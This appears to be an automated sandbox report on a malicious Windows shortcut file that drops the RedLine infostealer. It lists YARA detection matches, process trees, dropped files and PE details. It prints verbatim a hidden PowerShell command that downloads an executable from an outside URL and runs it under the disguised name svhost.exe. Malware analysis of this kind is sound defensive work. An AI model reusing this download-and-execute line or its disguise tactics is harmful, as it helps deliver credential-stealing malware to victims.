                    Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Found URL in windows shortcut file (LNK)
                    Source: Initial fileStrings: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to dropped file
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk, type: SAMPLEMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
                    Source: amsi64_4852.amsi.csv, type: OTHERMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.56e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.4760090.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4760090.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.56e0000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.42b0010.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.327507977.000001D9DA350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.327351810.000001D9DA340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8163D1660
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_0173EDB0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_01736B49
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_0173716B
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_01731110
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_01736DC0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_017310E0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_017313C8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_017313B9
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056BF5D8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056B86B8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056B1070
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056BCEF8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056B29E0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056BF5C9
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056B86A9
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_056BCEE8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_05A56EB0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_05A50007
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_05A50040
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_05A56EA0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0175FA30
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0175DE10
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0175D2F0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057821D8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_05781D98
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578BE80
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057868F8
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_05782610
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_05780190
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E5530
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E7738
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E772B
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E4288
                    Source: svhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Opgcxhsdw.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkReversingLabs: Detection: 74%
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkVirustotal: Detection: 59%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkLNK file: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tkd4yp5.4vu.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winLNK@18/15@3/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3216:120:WilError_01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    barindex
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 2.2.svhost.exe.5960000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.464775648.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opgcxhsdw.exe PID: 624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opgcxhsdw.exe PID: 5216, type: MEMORYSTR
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_03106A52 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_03106A58 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 2_2_05A531EA push edx; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578D45F push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578FC20 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578D91B push A4057D3Eh; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578D839 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578D880 push edi; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578D887 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_0578FB90 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057EB5C0 push cs; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E87C3 push eax; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057EE1F2 push eax; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057EE1F0 pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057EE044 push eax; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057EE028 push ecx; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 7_2_057E7393 push esp; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.998651527995621
